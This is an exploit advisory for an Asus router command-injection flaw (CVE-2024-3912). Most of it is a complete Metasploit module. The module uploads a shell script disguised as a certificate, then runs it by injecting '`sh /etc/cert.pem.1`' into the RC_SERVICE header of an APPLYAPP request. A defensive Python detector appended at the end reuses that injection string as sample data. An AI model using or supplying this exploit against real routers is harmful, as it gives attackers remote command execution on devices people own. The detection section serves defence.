=============================================================================================================================================
| # Title     : Asus router Multi-Stage Command Injection via SETROOTCERTIFICATE Leading to Remote Command Execution |
| # Author    : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor    : https://router.asus.com/ |
=============================================================================================================================================

[+] Summary :

A multi-stage command injection vulnerability (CVE-2024-3912) allows an attacker to achieve remote command execution on a vulnerable device by abusing the SETROOTCERTIFICATE and APPLYAPP HTTP methods.

In the first stage, a shell script disguised as a certificate file is uploaded to the target through a SETROOTCERTIFICATE request. The uploaded content is written to the filesystem, where it can later be executed.

In the second stage, the attacker triggers command execution by injecting a shell command into the RC_SERVICE header of an APPLYAPP request, which executes the previously uploaded script.

Successful exploitation results in arbitrary command execution with the privileges of the affected service.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Multi-Stage Command Injection Exploit (SETROOTCERTIFICATE)',
      'Description'    => %q{
        This module exploits a multi-stage command injection vulnerability.
        Stage 1: Loads a script disguised as a certificate.
        Stage 2: Executes the script via RC_SERVICE command injection.
      },
      'Author'         => [ 'indoushka' ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [ ['Generic Device', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2026-03-07'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL/TLS', true])
      ]
    )
  end

  def check
    print_status("Checking the target's response...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, '/')
    })
    return CheckCode::Unknown unless res
    if res.code == 200
      return CheckCode::Detected
    end
    CheckCode::Safe
  end

  def exploit
    # Stage 1 body: a script wrapped in PEM-style markers so it is accepted as a certificate.
    payload_body = <<~XML
      -----BEGIN RSA PRIVATE KEY-----
      id
      -----BEGIN CERTIFICATE-----
    XML

    print_status("Phase 1: Load payload via SETROOTCERTIFICATE")
    res = send_request_cgi({
      'method' => 'SETROOTCERTIFICATE',
      'uri'    => normalize_uri(target_uri.path, '/favicon.ico/'),
      'data'   => payload_body
    }, 20)
    unless res
      fail_with(Failure::Unreachable, "No response received from target")
    end
    print_good("Payload complete")

    Rex.sleep(1)

    print_status("Phase 2: Starting execution via APPLYAPP")
    res = send_request_cgi({
      'method'  => 'APPLYAPP',
      'uri'     => normalize_uri(target_uri.path, '/favicon.ico/'),
      'headers' => {
        'ACTION_MODE' => 'apply',
        'SET_NVRAM'   => 'aa',
        'RC_SERVICE'  => '`sh /etc/cert.pem.1`'
      }
    }, 20)
    unless res
      fail_with(Failure::Unreachable, "No response received during execution")
    end
    print_good("Exploitation request sent successfully")
  end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
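Detection logic for the two-stage pattern described in the Summary above, as an added example written from the defender's side; it is not part of the advisory or of the Metasploit module. It flags the non-standard SETROOTCERTIFICATE/APPLYAPP methods, shell metacharacters in the RC_SERVICE header, and a stage-1 upload followed by a stage-2 trigger from the same source within a short window. The request records, the `restart_wan` value and the time window are constructed sample data; the method names, header names and paths are the ones quoted in the advisory.

```python
import re

# Constructed sample requests: (timestamp_s, src_ip, method, path, headers).
# Entries 2 and 3 mirror the two stages of the advisory; the others are benign noise.
SAMPLE_REQUESTS = [
    (100, "10.0.0.5", "GET", "/", {}),
    (101, "10.0.0.9", "SETROOTCERTIFICATE", "/favicon.ico/", {}),
    (102, "10.0.0.9", "APPLYAPP", "/favicon.ico/",
     {"ACTION_MODE": "apply", "SET_NVRAM": "aa", "RC_SERVICE": "`sh /etc/cert.pem.1`"}),
    (103, "10.0.0.7", "APPLYAPP", "/",
     {"ACTION_MODE": "apply", "RC_SERVICE": "restart_wan"}),  # constructed benign value
]

NONSTANDARD_METHODS = {"SETROOTCERTIFICATE", "APPLYAPP"}
# Characters that let a value break out into the shell; none belong in an rc_service name.
SHELL_META = re.compile(r"[`$;|&<>(){}\n]")
STAGE_WINDOW = 60  # seconds between upload and trigger to count as one chain (assumed)


def inspect_request(method, path, headers):
    """Return a list of findings for a single request (empty when nothing is suspicious)."""
    findings = []
    hdrs = {k.upper(): v for k, v in headers.items()}  # header names are case-insensitive
    if method in NONSTANDARD_METHODS:
        findings.append(f"nonstandard method {method}")
        # The advisory sends both admin methods to a static-resource path.
        if path.rstrip("/").endswith("favicon.ico"):
            findings.append("admin method sent to static resource path")
    rc = hdrs.get("RC_SERVICE", "")
    if SHELL_META.search(rc):
        findings.append(f"shell metacharacters in RC_SERVICE: {rc!r}")
    return findings


def detect_chains(requests, window=STAGE_WINDOW):
    """Correlate a SETROOTCERTIFICATE upload followed by an APPLYAPP trigger per source IP.

    Returns (src_ip, upload_ts, trigger_ts) tuples for every matched two-stage chain.
    """
    last_upload = {}
    alerts = []
    for ts, src, method, _path, _headers in sorted(requests, key=lambda r: r[0]):
        if method == "SETROOTCERTIFICATE":
            last_upload[src] = ts
        elif method == "APPLYAPP" and src in last_upload and ts - last_upload[src] <= window:
            alerts.append((src, last_upload[src], ts))
    return alerts


if __name__ == "__main__":
    for ts, src, method, path, headers in SAMPLE_REQUESTS:
        for f in inspect_request(method, path, headers):
            print(f"[{ts}] {src} {method} {path}: {f}")
    for src, up, trig in detect_chains(SAMPLE_REQUESTS):
        print(f"two-stage chain from {src}: upload at {up}, trigger at {trig}")
```

Per-request findings are useful on their own; the chain alert is the high-confidence signal, since a legitimate administrator has no reason to send a certificate upload and an apply request to /favicon.ico/ back to back.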